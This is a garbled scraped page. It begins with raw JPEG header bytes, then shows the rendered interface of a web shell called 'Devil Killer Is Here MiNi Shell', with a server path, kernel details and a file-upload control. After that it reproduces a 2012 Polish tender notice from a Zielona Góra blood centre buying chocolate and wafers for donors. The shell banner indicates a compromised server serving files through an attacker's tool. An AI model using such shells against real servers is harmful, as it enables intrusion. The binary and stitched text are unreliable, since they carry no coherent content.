JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120424/92907-N-2012.html

<p class="kh_header"><b>Zielona Góra: Dostawy czekolady oraz wafli czekoladowych</b><br>
<b>Numer ogłoszenia: 92907 - 2012; data zamieszczenia: 24.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalne Centrum Krwiodawstwa i Krwiolecznictwa , ul. Zyty 21, 65-046 Zielona Góra, woj. lubuskie, tel. 068 3298360, faks 068 3298399.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rckik.zgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy czekolady oraz wafli czekoladowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy czekolady oraz wafli czekoladowych, które Zamawiający wydaje dawcom krwi dla zrównoważenia wysiłku energetycznego. Dostawy są realizowane wg bieżących potrzeb Zamawiającego, na zasadach opisanych w Istotnych postanowieniach umowy stanowiących załącznik nr 1 do SIWZ.2.	Zamawiający dopuszcza składanie ofert w częściach. Każda część przedmiotu zamówienia stanowi odrębne zadanie. 
zadanie nr 1)
1. Ilość sztuk czekolady: 320 000 (trzysta dwadzieścia tysięcy sztuk).
2.Zamawiający wymaga, aby czekolada była w następującym asortymencie:
2.1 czekolada twarda mleczna - 37,50% asortymentu,
2.2 czekolada deserowa - 25% asortymentu,
2.3 czekolada twarda mleczna z dodatkami - orzechy laskowe - 25 % asortymentu,
2.4 czekolada twarda mleczna z dodatkami - bakalie (inne niż orzechy laskowe) - 12,50% asortymentu.
zadanie nr 2)
1. Ilość sztuk i asortyment.
1.1 Wafel przekładany kremem orzechowym w czekoladzie mlecznej lub deserowej ilośc sztuk 20 000,
1.2 Wafel przekładany kremem kakaowym w czekoladzie mlecznej lub deserowej ilośc sztuk 20 000,
1.3 Ogólem ilość sztuk 40 000..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielania zamówień uzupełniających, 
o których mowa w art. 67 ust. 1 pkt 7 ustawy - PZP, przy czym wartość zamówień uzupełniających nie będzie przekraczać 5% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.84.20.00-2, 15.84.20.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	W prowadzonym postępowaniu Zamawiający określa wadium w wysokości 10 000 PLN (słownie dziesięć tysięcy złotych).
2.	Wadium należy wnieść przed upływem terminu składania ofert.
3.	Wadium może być wnoszone w następujących formach:
-	pieniądzu,
-	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-	gwarancjach bankowych,
-	gwarancjach ubezpieczeniowych, 
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z poźn. zm.).
4.	Wadium wnoszone w pieniądzu należy wpłacać przelewem na rachunek bankowy Regionalnego Centrum Krwiodawstwa i Krwiolecznictwa w Zielonej Górze nr: RAIFFEISEN BANK Polska S.A. ul. Piękna 20, 00-549 Warszawa/Oddział Zielona Góra  74 1750 1149 0000 0000 0427 3877.
5.	Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a PZP.
6.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
7.	 Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
8.	Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 45 ust. 1 PZP, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
9.	Jeżeli Wykonawca wniósł wadium w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew na rachunek bankowy wskazany przez Wykonawcę.
10.	Zamawiający wymaga, aby Wykonawca w swojej ofercie zamieścił nr rachunku bankowego, na który należy zwrócić wadium.
11.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana odmówi podpisania umowy na warunkach określonych w ofercie lub zawarcie umowy 
w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.
12.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeśli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 PZP, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1 PZP lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca spełnia ww warunek Zamawiający wymaga złożenia oświadczenia o spełnieniu warunków, o których mowa w art. 22 ust. 1 ustawy PZP - wzór oświadczenia stanowi załącznik nr 2.1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca spełnia ww warunek Zamawiający wymaga złożenia oświadczenia o spełnieniu warunków, o których mowa w art. 22 ust. 1 ustawy PZP - wzór oświadczenia stanowi załącznik nr 2.1 do SIWZ.
Dodatkowo Wykonawca do oferty załączy wykaz wykonanych dostaw w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonana i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy zostały wykonane należycie. Za spełnienie warunku posiadania doświadczenia Zamawiający uzna, gdy Wykonawca przedstawi w wykazie minimum trzy zrealizowane dostawy wyrobów spożywczych, których wartość dla  każdej z dostaw jest większa od 200 000 zł ze wskazaniem Zamawiających oraz dokumentów wskazujących na należyte wykonanie zamówienia - załącznik nr 2.3</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca spełnia ww warunek Zamawiający wymaga złożenia oświadczenia o spełnieniu warunków, o których mowa w art. 22 ust. 1 ustawy PZP - wzór oświadczenia stanowi załącznik nr 2.1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca spełnia ww warunek Zamawiający wymaga złożenia oświadczenia o spełnieniu warunków, o których mowa w art. 22 ust. 1 ustawy PZP - wzór oświadczenia stanowi załącznik nr 2.1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca spełnia ww warunek Zamawiający wymaga złożenia oświadczenia o spełnieniu warunków, o których mowa w art. 22 ust. 1 ustawy PZP - wzór oświadczenia stanowi załącznik nr 2.1 do SIWZ.
Dodatkowo Wykonawca do oferty załączy opłaconą polisę, a przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Polisa musi być ważna na dzień składania ofert. Za spełnienie warunku Zamawiający uzna, gdy wartość polisy będzie co najmniej równa wartości oferty składanej przez Wykonawcę</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymagania określonym przez Zamawiającego, należy przedstawić następujące dokumenty:
1. Zadanie 1:
1.1 informację (specyfikację jakościową) zawierającą dane o parametrach jakościowych wyrobu dla każdego rodzaju oferowanej czekolady, pozwalającą sprawdzić spełnienie warunków określonych w pkt III.5 SIWZ,
1.2 próbki oferowanych wyrobów, tzn. minimum po dwie tabliczki czekolady dla każdego z oferowanych rodzajów,
1.3 wzory obwolut każdego rodzaju czekolady, które będą stanowić podstawę do oceny kryterium Estetyka opakowania,
1.4 wzór opakowania kartonowego - ilość czekolad w jednym opakowaniu  8 szt.
2. Zadanie2:
2.1	informację (specyfikację jakościową) zawierającą dane o parametrach jakościowych wyrobu dla każdego rodzaju oferowanych wafelków, pozwalającą sprawdzić spełnienie warunków określonych w pkt III.6 SIWZ,
2.2	próbki oferowanych wyrobów, tzn. minimum po jednej sztuce wafelków wraz z opakowaniem dla każdego z oferowanych rodzajów wafli.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 PZP Zamawiający zastrzega sobie możliwość zmiany istotnych postanowień zawartej umowy w sytuacji obiektywnej konieczności wprowadzenia zmiany, w niżej przedstawionym zakresie z zastrzeżeniem art. 140 ust. 1 i 3 ustawy PZP:
1. zmiany warunków i terminów dostawy przedmiotu zamówienia - zmiany te mogą wystąpić na skutek negatywnych okoliczności mających bezpośredni wpływ na organizacje dostaw, trudności transportowych, celnych,
2) zmiany warunków i terminów płatności - zmiany wynikające ze stopnia wykorzystania środków i terminów ich wydatkowania, zmiany wynikające ze zmiany w prawie właściwym dla podatków i ceł, co w zależności od rodzaju zmian, jakie będą miały miejsce będzie skutkowało obniżeniem lub podwyższeniem ceny jednostkowej przedmiotu zamówienia,
3)	zmiany danych Wykonawcy (np. zmiana siedziby, adresu, nazwy) lub zmiana wynikająca 
z przekształcenia podmiotowego po stronie Wykonawcy,
4)	zmiany wynikające z niezgodności pomiędzy zapisami umowy a treścią oferty i/lub SIWZ.
2.	Zamawiający zastrzega sobie również możliwość zmiany, z zastrzeżeniem art. 140 ust. 1 i 3 ustawy PZP w przypadku:
5.1	zmiany w obowiązujących przepisach prawa mające wpływ na przedmiot 
i warunki umowy przez zmianę sytuacji prawnej lub faktycznej Wykonawcy i/lub Zamawiającego skutkująca niemożliwością realizacji umowy,
5.2	powstanie nadzwyczajnych okoliczności (nie będących siłą wyższą) grożące rażącą stratą, których strony nie przewidziały przy zawarciu umowy.
6.	Wyżej wymienione zmiany mogą być dokonane na wniosek Zamawiającego lub Wykonawcy, za zgodą obu stron i zostaną wprowadzone do umowy aneksem</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rckik.zgora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalne Centrum Krwiodawstwa 
i Krwiolecznictwa w Zielonej Górze (RCKiK)
ul. Zyty 21
65-046 Zielona Góra.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.05.2012 godzina 13:00, miejsce: Regionalne Centrum Krwiodawstwa 
i Krwiolecznictwa w Zielonej Górze (RCKiK)
ul. Zyty 21
65-046 Zielona Góra
salka konferencyjna -pokój nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa czekolady.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Ilość sztuk czekolady: 320 000 (trzysta dwadzieścia tysięcy sztuk).
2	Zamawiający wymaga, aby czekolada była w następującym asortymencie:
2.1	czekolada twarda mleczna - 37,50% asortymentu,
2.2	czekolada deserowa - 25% asortymentu,
2.3	czekolada twarda mleczna z dodatkami - orzechy laskowe - 25 % asortymentu,
2.4	czekolada twarda mleczna z dodatkami - bakalie (inne niż orzechy laskowe) - 12,50% asortymentu.
3	Wymagania jakie powinna spełniać oferowana czekolada:
3.1	czekolada twarda pełna,
3.2	masa jednej tabliczki czekolady 100 g,
3.3	 zawartość masy kakaowej:
a)	dla czekolady deserowej (pozycja 5.2.2) co najmniej 50%,
b)	dla pozostałego asortymentu (pozycja 5.2.1, 5.2.3, 5.2.4) co najmniej 25%,
3.4	kaloryczność jednej tabliczki czekolady a 100 g co najmniej 500 kcal,
3.5	maksymalna zawartość tłuszczów roślinnych - 5%,
3.6	okres przydatności do spożycia  - co najmniej 9 miesięcy od daty dostarczenia produktu do magazynu Zamawiającego.
4	Warunki przechowywania - miejsce suche i chłodne temp. do 180C.
5	Oferowana czekolada musi posiadać niezbędne świadectwa dopuszczenia do obrotu w Polsce zgodnie z obowiązującymi przepisami w tym spełniać wymagania określone w normie PN-A-88102:1998 Wyroby cukiernicze - Czekolada.
6	Wymagania dotyczące opakowania:
6.1	wszystkie informacje określone w pkt 5 muszą znajdować się na opakowaniu albo 
w dołączonej do oferty specyfikacji technicznej wyrobu,
6.2	każda tabliczka czekolady musi być pakowana w podwójnym opakowaniu: pierwsze opakowanie winno posiadać zewnętrzną powierzchnię pokrytą folią aluminiową lub inną atermiczną powierzchnię chroniącą przed ciepłem, wilgocią lub innymi szkodliwymi dla czekolady czynnikami, drugie opakowanie winno być kolorowe i atrakcyjne graficznie, Zamawiający nie dopuszcza kontaminacji czekolady obcym zapachem (np. z opakowania), drugie opakowanie nie może być opakowaniem okolicznościowym lub świątecznym (na przykład bożonarodzeniowym, wielkanocnym, walentynkowym etc.).
6.3	Zamawiający wymaga aby przedmiot zamówienia dostarczany był w opakowaniach kartonowych z logo Zamawiającego zawierającym po 8 szt. czekolad w jednym opakowaniu wg poniższej specyfikacji:.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.21.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Jakość wyrobu - 35</li>
<li>3. Estetyka opakowania - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wafle przekładane kremem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Ilość sztuk i asortyment:
1.1.Wafel przekładany kremem orzechowym w czekoladzie mlecznej lub deserowej ilość 20 000 sztuk,
1.2 Wafel przekładany kremem kakaowym w czekoladzie mlecznej lub deserowe ilość 20 000 sztuk,
1.3 Ogólem; 40 000 sztuk.
2	Masa jednego wafla co najmniej 35 g.
3	Kaloryczność 100 g produktu co najmniej 500 kcal.
4	Charakterystyka organoleptyczna:
